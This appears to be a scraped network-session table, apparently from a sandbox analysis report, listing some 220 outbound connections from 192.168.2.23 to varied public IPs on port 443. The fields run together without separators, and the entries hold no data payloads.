                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26177192.168.2.2340556122.177.32.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26178192.168.2.233823853.102.253.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26179192.168.2.2347248184.103.116.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26180192.168.2.2338146185.47.26.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26181192.168.2.234492035.201.183.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26182192.168.2.2334200220.168.34.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26183192.168.2.2333790154.25.100.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26184192.168.2.2333396145.62.250.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26185192.168.2.235138648.112.72.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26186192.168.2.2353230145.32.3.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26187192.168.2.235435467.228.45.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26188192.168.2.2356458176.6.19.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26189192.168.2.2354700208.199.158.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26190192.168.2.2354192217.80.38.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26191192.168.2.234234469.51.133.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26192192.168.2.2342474198.152.39.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26193192.168.2.235721873.233.113.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26194192.168.2.23405224.132.127.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26195192.168.2.235038049.62.179.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26196192.168.2.233345236.58.241.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26197192.168.2.2354606213.108.20.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26198192.168.2.2358268170.50.233.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26199192.168.2.2334230139.117.38.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26200192.168.2.233946643.107.94.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26201192.168.2.23372868.166.150.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26202192.168.2.2360968184.206.252.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26203192.168.2.234282639.112.252.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26204192.168.2.2340708166.89.17.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26205192.168.2.2336852196.12.226.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26206192.168.2.2334820132.27.48.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26207192.168.2.234106241.183.7.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26208192.168.2.23466064.206.187.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26209192.168.2.234583237.194.45.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26210192.168.2.2336776157.64.62.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26211192.168.2.2350720129.59.111.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26212192.168.2.2337376134.79.251.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26213192.168.2.2345794165.1.170.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26214192.168.2.233460432.162.255.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26215192.168.2.2358638133.159.255.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26216192.168.2.2346098132.160.242.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26217192.168.2.233991852.224.131.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26218192.168.2.2357284152.78.215.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26219192.168.2.234511088.98.137.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26220192.168.2.234932269.80.223.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26221192.168.2.2345982131.2.87.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26222192.168.2.2333116110.198.78.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26223192.168.2.234621483.106.90.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26224192.168.2.235627464.19.141.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26225192.168.2.236057025.103.103.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26226192.168.2.234399283.136.247.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26227192.168.2.2358098183.59.77.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26228192.168.2.23539268.187.225.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26229192.168.2.235607275.117.174.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26230192.168.2.2341548102.32.39.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26231192.168.2.234409889.191.121.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26232192.168.2.2333332124.31.220.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26233192.168.2.2346478160.154.116.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26234192.168.2.235980447.237.230.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26235192.168.2.235400043.172.35.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26236192.168.2.233713068.143.191.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26237192.168.2.23338248.222.142.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26238192.168.2.2340072192.143.88.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26239192.168.2.234220274.0.69.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26240192.168.2.234562467.147.106.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26241192.168.2.2351706112.233.115.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26242192.168.2.2360802100.213.37.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26243192.168.2.2359832148.152.222.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26244192.168.2.2346254153.157.120.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26245192.168.2.2351668121.80.107.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26246192.168.2.2333268158.55.34.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26247192.168.2.235476212.126.129.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26248192.168.2.233593678.58.68.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26249192.168.2.235118052.137.30.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26250192.168.2.2346090104.146.6.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26251192.168.2.2351888114.101.107.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26252192.168.2.234984448.19.235.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26253192.168.2.2359822108.193.12.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26254192.168.2.2336074150.168.98.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26255192.168.2.234754699.151.175.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26256192.168.2.2340832188.36.136.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26257192.168.2.235425649.182.66.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26258192.168.2.2348334116.125.73.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26259192.168.2.2348112151.163.44.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26260192.168.2.2353708132.138.61.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26261192.168.2.2332926157.254.75.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26262192.168.2.2349394120.82.72.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26263192.168.2.233432213.57.208.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26264192.168.2.2344482124.170.187.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26265192.168.2.2338226138.91.109.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26266192.168.2.2349912140.151.245.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26267192.168.2.2341124205.81.153.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26268192.168.2.235416684.107.11.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26269192.168.2.2356890191.107.188.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26270192.168.2.2351208198.123.43.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26271192.168.2.236008434.32.40.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26272192.168.2.23389561.22.96.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26273192.168.2.2353264209.46.193.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26274192.168.2.2354694110.176.24.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26275192.168.2.2339430113.152.41.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26276192.168.2.234580699.170.22.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26277192.168.2.2338890102.33.249.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26278192.168.2.235787866.111.29.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26279192.168.2.235061613.28.119.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26280192.168.2.234709048.133.175.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26281192.168.2.2337348204.44.225.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26282192.168.2.235774474.120.203.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26283192.168.2.2346992217.20.114.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26284192.168.2.2344810116.17.219.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26285192.168.2.235305487.119.183.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26286192.168.2.234240092.140.248.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26287192.168.2.2338472160.186.80.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26288192.168.2.2356778138.211.196.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26289192.168.2.234611623.114.195.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26290192.168.2.23399485.115.79.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26291192.168.2.2358726137.142.179.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26292192.168.2.235873681.205.47.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26293192.168.2.2352412200.221.217.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26294192.168.2.233366891.219.47.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26295192.168.2.2360968199.57.201.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26296192.168.2.2344828206.162.177.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26297192.168.2.235447260.90.22.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26298192.168.2.2341496200.237.41.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26299192.168.2.2357054140.68.217.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26300192.168.2.2344102182.73.199.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26301192.168.2.233907693.151.146.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26302192.168.2.234948847.119.57.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26303192.168.2.2336468208.31.130.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26304192.168.2.235716085.172.178.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26305192.168.2.234911636.9.19.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26306192.168.2.2339372182.52.151.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26307192.168.2.2335490141.179.161.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26308192.168.2.2351272142.149.248.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26309192.168.2.2360846126.188.66.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26310192.168.2.2355494111.4.99.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26311192.168.2.2339250153.200.152.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26312192.168.2.2341158220.175.12.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26313192.168.2.235408644.51.110.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26314192.168.2.2351334110.253.205.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26315192.168.2.23412802.131.193.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26316192.168.2.234492697.234.115.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26317192.168.2.235382640.90.71.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26318192.168.2.2350602177.223.197.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26319192.168.2.234926270.164.69.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26320192.168.2.233830674.90.186.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26321192.168.2.234350475.247.62.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26322192.168.2.2340896203.83.152.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26323192.168.2.2354044189.159.181.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26324192.168.2.2345868129.84.9.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26325192.168.2.235608295.118.95.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26326192.168.2.234040063.96.163.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26327192.168.2.234838281.186.248.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26328192.168.2.2339740138.230.180.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26329192.168.2.233567818.16.31.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26330192.168.2.2360038148.132.118.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26331192.168.2.2339300154.182.72.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26332192.168.2.2346070143.220.35.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26333192.168.2.2354954211.127.10.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26334192.168.2.233577863.57.251.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26335192.168.2.235995882.10.253.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26336192.168.2.2333952116.105.165.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26337192.168.2.235807013.169.95.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26338192.168.2.234533457.44.8.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26339192.168.2.2351892128.15.48.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26340192.168.2.2357468136.160.238.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26341192.168.2.235239444.117.200.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26342192.168.2.2339218166.84.253.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26343192.168.2.2338342103.77.211.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26344192.168.2.234294245.228.44.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26345192.168.2.235808678.96.225.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26346192.168.2.2352004103.158.133.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26347192.168.2.2341790129.67.161.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26348192.168.2.2352364103.64.6.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26349192.168.2.233934236.9.17.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26350192.168.2.2337550108.14.85.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26351192.168.2.234852438.109.148.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26352192.168.2.2343806116.229.176.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26353192.168.2.2355910187.123.42.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26354192.168.2.234410852.45.91.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26355192.168.2.234468469.70.161.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26356192.168.2.233287494.235.195.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26357192.168.2.2350236213.111.132.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26358192.168.2.2354858171.73.84.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26359192.168.2.2357314197.220.198.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26360192.168.2.234581235.163.155.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26361192.168.2.235464495.3.28.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26362192.168.2.234330280.32.173.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26363192.168.2.235475442.212.207.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26364192.168.2.233504680.24.111.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26365192.168.2.2343790206.135.139.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26366192.168.2.2346298128.99.159.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26367192.168.2.234627676.160.8.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26368192.168.2.2352686185.174.236.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26369192.168.2.235170032.245.230.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26370192.168.2.2336300179.195.176.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26371192.168.2.2335628149.29.38.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26372192.168.2.2353934160.238.76.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26373192.168.2.2349252150.182.210.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26374192.168.2.2346934174.190.90.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26375192.168.2.2343984216.67.187.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26376192.168.2.2343062134.17.190.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26377192.168.2.2353564183.105.98.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26378192.168.2.2350242111.193.13.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26379192.168.2.2338498171.179.129.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26380192.168.2.2333530194.213.67.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26381192.168.2.2347738184.60.212.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26382192.168.2.233480647.77.213.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26383192.168.2.2343738156.179.171.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26384192.168.2.235656862.93.202.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26385192.168.2.234445860.83.35.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26386192.168.2.234597693.221.127.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26387192.168.2.234537699.249.233.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26388192.168.2.2349758218.20.176.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26389192.168.2.2338782179.222.48.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26390192.168.2.23520842.134.18.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26391192.168.2.233673676.175.205.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26392192.168.2.2335362165.26.184.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26393192.168.2.2341120200.229.39.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26394192.168.2.2333530102.67.35.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26395192.168.2.2333822175.184.142.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26396192.168.2.2358938164.147.123.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26397192.168.2.234751843.34.210.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26398192.168.2.2351256120.23.85.117443
